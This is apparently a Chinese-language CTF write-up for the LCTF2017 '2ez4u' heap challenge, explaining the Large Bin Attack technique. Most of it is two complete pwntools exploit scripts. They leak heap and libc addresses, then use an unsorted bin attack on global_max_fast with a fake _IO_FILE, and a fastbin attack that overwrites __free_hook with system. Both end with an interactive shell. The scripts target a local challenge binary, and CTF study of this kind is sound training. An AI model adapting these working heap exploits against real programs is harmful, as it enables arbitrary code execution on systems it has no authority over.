2020-04-10

Large_Bin_Attack

依旧是不定时更新,东拼西凑,到处查看其他师傅的WP,一知半解的写下了此页,然后就是准备写一下不同的方法

2ez4u-LCTF2017

Download

Global_Max_Fast

程序由于只能泄漏chunk->bk_nextsize域往后的内容,故利用Large Bin Attack

Leak the heap_base:通过free掉两个同一IDX的large chunk则可打印出堆地址
Leak the libc_base:首先布置一个fake_large_chunk,然后通过unlink申请该chunk,由于该large chunk 可以包含一个small chunk,在申请fake_chunk之前,将两个不相邻而大小相同的small chunk扔进unsorted bins,申请fake_chunk时就会进入small bin,然后申请出small bin中的尾块,即可在fake_chunk包含的那个块中写上libc的某地址,进而取得libc_base
Global Max Fast:修复包含的small chunk的size域,申请出来然后放进unsorted bins中,通过fake_chunk修改该块的内容,利用unsorted bin attack在global max fast写上一个很大的值,然后再次修改该块的size域,满足free掉的位置处于&_IO_list_all上,并将其内容覆盖为fake_IO_FILE,释放掉会覆盖IO_list_all指针实现劫持,然后由于unsorted bins 损坏,再次申请即可crash 并getshell
注意链可能会修复等情况,以及small chunk申请会检测前一个块的fd域

from pwn import*
context.log_level ='DEBUG'
def new(size,content,sign=0):
	p.sendlineafter('your choice:','1')
	p.sendlineafter('color?(0:red, 1:green):','0')
	p.sendlineafter('value?(0-999):','0')
	p.sendlineafter('num?(0-16):','0')
	p.sendlineafter('description length?(1-1024):',str(size))
	if sign == 1:
		return
	p.sendafter('description of the apple:',content)
def free(index):
	p.sendlineafter('your choice:','2')
	p.sendlineafter('which?(0-15):',str(index))
def edit(index,content):
	p.sendlineafter('your choice:','3')
	p.sendlineafter('which?(0-15):',str(index))
	p.sendlineafter('color?(0:red, 1:green):','2')
	p.sendlineafter('value?(0-999):','1000')
	p.sendlineafter('num?(0-16):','17')
	p.sendafter('description of the apple:',content)
def show(index):
	p.sendlineafter('your choice:','4')
	p.sendlineafter('which?(0-15):',str(index))
p = process('./main')
libc = ELF('./libc-2.24.so',checksec=False)
new(0x3F0,'FMYY\n')
new(0xD8 ,'FMYY\n')
new(0x3F0,'FMYY\n')
new(0xD8 ,'FMYY\n')
free(2)
free(0)
new(0x400,'FMYY\n')
show(2)
p.recvuntil('description:')
heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x510
log.info('HEAP:\t' + hex(heap_base))
#clear all chunks
free(0)
free(3)
free(1)
free(0) #here I just want to free all chunks so that I can layout the new structure once again
#-------------------
unlink = heap_base + 0x28
P = heap_base + 0xB60

new(0x10,p64(P) + '\n')
new(0xD8,'FMYY\n')
new(0x3F0,'FMYY\n')
new(0xD8,'FMYY\n')
new(0x3E0,'FMYY\n')
new(0xD8,'FMYY\n')
new(0xD8,p64(0x411) + p64(unlink -0x18) + p64(unlink -0x10) + p64(0)*2 + '\n')
new(0x1D8,'FMYY\n')
new(0x98  ,'FMYY\n')
new(0x1D8,p64(0)*9 + p64(0x410) + p64(0x20) + p64(0)*2 + p64(0) + p64(0x21)  + '\n')
new(0x400,'FMYY\n')
new(0x400,'FMYY\n')
new(0x400,'FMYY\n')
new(0x2A0,'FMYY\n')
new(0x128,p64(0) + p64(0x1410) + p64(0x21) + p64(0)*2 + p64(0) + p64(0x21) + '\n')
free(0)
free(2)
free(4)
new(0x400,'FMYY\n')
edit(4,p64(P) + '\n')
free(9)
free(7)
new(0x3F0,'U'*24*8 + p32(0xDEADBEEF)*2 + '\n') #So far,we have get the fake_chunk ,and the index is 2
new(0x1D8,'FMYY\n')
edit(4,p64(heap_base + 0x130) + '\n') #fix the large bins
show(2)
p.recvuntil('\xEF\xBE\xAD\xDE'*2)
libc_base=u64(p.recv(6).ljust(8,'\x00')) -584 - 0x10 -libc.sym['__malloc_hook']
libc.address = libc_base
IO_list_all = libc.sym['_IO_list_all']
system = libc.sym['system']
binsh = libc.search('/bin/sh').next()
IO_str_jumps =libc_base + 0x3BE4C0
Global_max_fast = libc_base + 0x3C37D0
log.info('LIBC:\t' + hex(libc_base))
edit(2,'\x00'*24*8 + p64(0X201) + p64(584 + 0x10 + libc.sym['__malloc_hook'])*2+ '\n')
new(0x1D8,'FMYY\n') #7
free(7)
edit(2,'\x00'*24*8 + p64(0x201) + p64(libc.sym['__malloc_hook'] + 0x10 + 88) + p64(Global_max_fast -0x10) + '\n')
new(0x1D8,'FMYY\n')
fake_IO_FILE = p64(0)*4
fake_IO_FILE += p64(0) + p64(1)
fake_IO_FILE += p64(0) + p64(binsh)
fake_IO_FILE  =fake_IO_FILE.ljust(0xD8,'\x00')
fake_IO_FILE += p64(IO_str_jumps - 8)
fake_IO_FILE += p64(0) + p64(system)
edit(2,'\x00'*24*8 + p64(0x1411) + fake_IO_FILE[0x10:] + '\n')
free(7)
new(0x300,'FMYY\n',sign=1)
#--------------

p.interactive()

'''
00000000 apple           struct; (sizeof=0x20)
00000000 color_choice    dd
00000004 num             dd
00000008 value           dq
00000010 index           dd
00000014 pad             dd
00000018 description     dq
00000020 apple           ends
#----------------
00000000 apple_manage    struct; (sizeof=0x10)
00000000 inuse           dd
00000004 size            dd
00000008 apple_ptr       dq                    ; offset
00000010 apple_manage    ends
'''

Modify TOP Chunk Ptr

此方法前半部分和上一个EXP类似,然后这里就是利用的fastbin attack

同样的方法泄漏heap_base 和libc_base
由于可以通过fake_chunk溢出修改包含的多个fastbin chunk,且在fastbins中的块被申请出去,main_arena相应的位置将更新信息,如果修改一个块的fd信息为target,当改块被申请时,main_arena相应位置即可变为target,因此这里利用该方法实现fastbin attack从而修改main_arena+88的地址处的指针为&__free_hook -0XB58
注意块的数量限制以及large bin的修复,多次申请即可到达free_hook上方,令free_hook为system,然后fake_chunk向下溢出修改一个块的fd域为’/bin/sh’并释放即可getshell

其他应该还可以利用unsorted bin attack 在free_hook或者malloc_hook上面写个很大的值,然后利用0x7F错位从而申请到上方的块,没有尝试,理论可以

from pwn import*
context.log_level ='DEBUG'
def new(size,content,sign=0):
	p.sendlineafter('your choice:','1')
	p.sendlineafter('color?(0:red, 1:green):','0')
	p.sendlineafter('value?(0-999):','0')
	p.sendlineafter('num?(0-16):','0')
	p.sendlineafter('description length?(1-1024):',str(size))
	if sign == 1:
		return
	p.sendafter('description of the apple:',content)
def free(index):
	p.sendlineafter('your choice:','2')
	p.sendlineafter('which?(0-15):',str(index))
def edit(index,content):
	p.sendlineafter('your choice:','3')
	p.sendlineafter('which?(0-15):',str(index))
	p.sendlineafter('color?(0:red, 1:green):','2')
	p.sendlineafter('value?(0-999):','1000')
	p.sendlineafter('num?(0-16):','17')
	p.sendafter('description of the apple:',content)
def show(index):
	p.sendlineafter('your choice:','4')
	p.sendlineafter('which?(0-15):',str(index))
p = process('./main')
libc = ELF('./libc-2.24.so',checksec=False)
new(0x3F0,'FMYY\n')
new(0xD8 ,'FMYY\n')
new(0x3F0,'FMYY\n')
new(0xD8 ,'FMYY\n')
free(2)
free(0)
new(0x400,'FMYY\n')
show(2)
p.recvuntil('description:')
heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x510
log.info('HEAP:\t' + hex(heap_base))
#clear all chunks
free(0)
free(3)
free(1)
free(0) #here I just want to free all chunks so that I can layout the new structure once again
#-------------------
unlink = heap_base + 0x28
P = heap_base + 0xB60

new(0x10,p64(P) + '\n')
new(0xD8,'FMYY\n')
new(0x3F0,'FMYY\n')
new(0xD8,'FMYY\n')
new(0x3E0,'FMYY\n')
new(0xD8,'FMYY\n')
new(0xD8,p64(0x411) + p64(unlink -0x18) + p64(unlink -0x10) + p64(0)*2 + '\n')
new(0x118,'FMYY\n')
new(0x60  ,'FMYY\n') #8
new(0x50  ,'FMYY\n') #9
new(0x70  ,'FMYY\n') #10
new(0x118,p64(0)*9 + p64(0x410) + p64(0x20) + p64(0)*2 + p64(0) + p64(0x21)  + '\n')
new(0x60,'FMYY\n')
free(0)
free(2)
free(4)
new(0x400,'FMYY\n')
edit(4,p64(P) + '\n')
free(11)
free(7)
new(0x3F0,'U'*24*8 + p32(0xDEADBEEF)*2 + '\n') #So far,we have get the fake_chunk ,and the index is 2
edit(4,p64(heap_base + 0x130) + '\n') #fix the large bins
new(0x118,'FMYY\n')
show(2)
p.recvuntil('\xEF\xBE\xAD\xDE'*2)
libc_base=u64(p.recv(6).ljust(8,'\x00')) -392 - 0x10 -libc.sym['__malloc_hook']
log.info('LIBC:\t' + hex(libc_base))
libc.address = libc_base
edit(2,'\x00'*24*8 + p64(0x141) + p64(392 + 0x10 + libc.sym['__malloc_hook'])*2+ '\n')
free(8)
free(9)
fake_fastbin = libc.sym['__malloc_hook'] + 0x10 + 0x30
payload = '\x00'*24*8 + p64(0x141) + p64(392 + 0x10 + libc.sym['__malloc_hook'])*2
payload += '\x00'*0x120
payload += p64(0) + p64(0x81) + p64(0x71) + p64(0)
payload += '\x00'*0x60
payload += p64(0) + p64(0x71) + p64(fake_fastbin) + '\n'
edit(2,payload)
new(0x60,'FMYY\n')
new(0x50,'FMYY\n')
new(0x50,p64(libc.sym['__free_hook'] -0xB58) + '\n')
free(7)
free(8)
new(0x300,'FMYY\n')
new(0x300,'FMYY\n')
new(0x300,'FMYY\n')
new(0x300,'FMYY\n')
new(0x300,'FMYY\n')
new(0x320,'\x00'*0x1D0 + p64(libc.sym['system']) + '\n')
payload = '\x00'*24*8 + p64(0x141)
payload += p64(392 + 0x10 + libc.sym['__malloc_hook'])*2+ '\x00'*0x120
payload += p64(0) + p64(0x81) + '\x00'*0x70
payload += p64(0) + p64(0x71) + '\x00'*0x60
payload += p64(0) + p64(0x91) + '/bin/sh\n'
edit(2,payload)
free(10)
p.interactive()

Link

参考文章
ptmalloc利用之largebin attack
Large bin attack–LCTF2017-2ez4u–writeup

风沐云烟